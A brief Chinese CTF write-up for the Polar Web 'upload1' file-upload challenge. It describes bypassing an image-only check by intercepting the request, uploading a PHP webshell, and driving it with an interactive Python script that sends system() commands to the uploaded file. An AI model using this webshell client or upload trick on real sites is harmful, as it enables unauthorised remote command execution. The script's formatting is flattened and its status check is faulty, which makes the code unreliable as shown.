Polar Web【简单】upload1
Polar Web【简单】upload1
Contents
- Polar Web【简单】upload1
- 思路
- EXP
- 运行&总结
思路
本题思路同之前两篇文中的文件上传题目性质相同,这里再次记录,旨在改良之前的脚本编写方式 —— 脚本运行后变为可交互的命令行形式。
- 打开环境,见要求上传文件,且类型仅为图片类型,因此仍然使用截取数据包的方式修改重发。
- 修改数据为木马后重发,未发生其他过滤,上传成功。
- 下文呈现可交互式脚本的基本逻辑,以供参考。
EXP
import requestsdef attack(url, cmd):data = {"cmd": cmd}resp = requests.post(url=url, data=data)if not resp.status_code != '200':print("No response...")returnprint(resp.text)if __name__ == '__main__':while True:u = 'http://~.www.polarctf.com:8090/uploads/sh.php'command = input('>> ')if command == 'quit':breakcommand = 'system("' + command + '");'attack(u, command)
运行&总结
- 重新尝试同类型的题目,通过本题改良了先前的Webshell连接脚本,使得运行后可操作性更强